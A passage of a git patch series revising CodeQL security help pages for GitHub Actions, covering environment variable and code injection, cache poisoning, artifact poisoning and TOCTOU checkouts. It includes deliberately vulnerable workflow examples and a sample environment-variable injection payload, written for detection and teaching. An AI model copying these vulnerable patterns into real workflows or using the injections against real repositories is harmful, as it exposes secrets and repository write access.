setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | @@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index a16b41e3970..cc35402b804 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} @@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. **Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | @@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References From e83841bba9a3be69d0c14aa4f6e9fb59ad65dae6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:29:26 +0000 Subject: [PATCH 0477/1267] fixes --- .../CWE-088/ArgumentInjectionCritical.md | 2 +- .../CWE-088/ArgumentInjectionMedium.md | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 4 +- .../Security/CWE-094/CodeInjectionMedium.md | 4 +- .../CWE-275/MissingActionsPermissions.md | 5 +- .../Security/CWE-285/ImproperAccessControl.md | 11 +-- .../CWE-349/CachePoisoningViaCodeInjection.md | 20 +++--- .../CWE-349/CachePoisoningViaDirectCache.md | 53 ++++++++++---- .../CachePoisoningViaPoisonableStep.md | 22 +++--- .../UntrustedCheckoutTOCTOUCritical.md | 72 +------------------ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 72 +------------------ .../CWE-571/ExpressionIsAlwaysTrue.md | 58 +++++++-------- .../CWE-829/ArtifactPoisoningCritical.md | 6 +- .../CWE-829/ArtifactPoisoningMedium.md | 6 +- .../CWE-829/UntrustedCheckoutCritical.md | 6 +- .../Security/CWE-829/UntrustedCheckoutHigh.md | 6 +- .../CWE-829/UntrustedCheckoutMedium.md | 6 +- 17 files changed, 126 insertions(+), 229 deletions(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 00dc3bad472..4957297be92 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md index 00dc3bad472..4957297be92 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index cc85f68fb0d..f2e49446811 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations @@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index cc85f68fb0d..f2e49446811 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations @@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 31ddab5329d..9385759dae9 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -2,12 +2,11 @@ ## Description -A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. +If a GitHub Actions job or workflow has no explicit permissions set, then the repository permissions are used. Repositories created under organizations inherit the organization permissions. The organizations or repositories created before February 2023 have the default permissions set to read-write. Often these permissions do not adhere to the principle of least privilege and can be reduced to read-only, leaving the `write` permission only to a specific types as `issues: write` or `pull-requests: write`. ## Recommendations -Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: +Add the `permissions` key to the job or the root of workflow (in this case it is applied to all jobs in the workflow that do not have their own `permissions` key) and assign the least privileges required to complete the task: ```yaml name: "My workflow" diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md index c517ff98e58..594f381d8ce 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.md +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md @@ -2,17 +2,20 @@ ## Description -An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. +Sometimes labels are used to approve GitHub Actions. An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed and approved by label. ## Recommendations -When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. +When using labels, make sure that the code cannot be modified after it has been reviewed and the label has been set. ## Examples ### Incorrect Usage -The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. There are two problems with the code: + +1. The workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. The workflow will be triggered every time a new change is added to the Pull Request. +2. The workflow uses `ref: ${{ github.event.pull_request.head.ref }}` for checkout, which is a branch name of the Pull Request. There is a window of opportunity for the attacker to modify their branch after the Pull Request is labeled, but before the workflow starts and runs the checkout. ```yaml on: @@ -33,7 +36,7 @@ jobs: ### Correct Usage -Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. +Make sure that the workflow only gets triggered when the label is set and use an immutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. ```yaml on: diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md index fb927f97c68..667c41dc153 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. @@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md index c3c5970c37f..c12fb799892 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. @@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -69,13 +69,12 @@ jobs: ### Correct Usage -The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. +The following workflow checking out untrusted files, but the cache is scoped to the Pull Request. ```yaml name: Secure Workflow on: - issue_comment: - types: [created] + pull_request: jobs: pr-comment: @@ -94,6 +93,34 @@ jobs: restore-keys: ${{ runner.os }}-pip- ``` +Note, that the example above doesn't allow using secrets if the Pull Request originates from a fork. In case secrets are needed, `pull_request_target` with labels as `safe to test` can be used, but the code in Pull Request must be manually reviewed before applying the label. + +```yaml +name: Secure Workflow +on: + pull_request_target: + types: [labeled] + +jobs: + pr-comment: + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha}} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + ## References - [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md index 70df52dc463..c777e198039 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. @@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -59,7 +59,7 @@ jobs: ### Correct Usage -The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch. +The following workflow runs untrusted code in a non-privileged job and the cache is scoped to the Pull Request branch. ```yaml name: Secure Workflow diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md index 105fe6ecd69..4e9b389834e 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description @@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: @@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md index 105fe6ecd69..4e9b389834e 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description @@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: @@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md index be1b566083a..1e7ea120cba 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md @@ -10,7 +10,7 @@ When an `if` condition erroneously evaluates to `true`, unintended steps may be To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: -1. Do not use Workflow Expressions in `if` conditions. +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. 2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. 3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. @@ -18,45 +18,45 @@ To avoid the vulnerability where an `if` condition always evaluates to `true`, i ### Correct Usage -1. Do not use Workflow Expressions: +1. Omit `${{` and `}}` in `if` conditions: -```yaml -if: steps.checks.outputs.safe_to_run == true -if: |- - steps.checks.outputs.safe_to_run == true -if: | - steps.checks.outputs.safe_to_run == true -``` + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` -2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: -```yaml -if: ${{ steps.checks.outputs.safe_to_run == true }} -if: |- - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ### Incorrect Usage 1. Do not mix Workflow Expressions with un-delimited expressions: -```yaml -if: ${{ steps.checks.outputs.safe_to_run }} == true -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` 2. Do not include trailing new lines or spaces: -```yaml -if: | - ${{ steps.checks.outputs.safe_to_run == true }} -if: > - ${{ steps.checks.outputs.safe_to_run == true }} -if: " ${{ steps.checks.outputs.safe_to_run == true }}" -if: |+ - ${{ steps.checks.outputs.safe_to_run == true }} -if: >+ - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ## References diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md index 2d7afb6b66e..9b1782d6ba8 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations @@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the 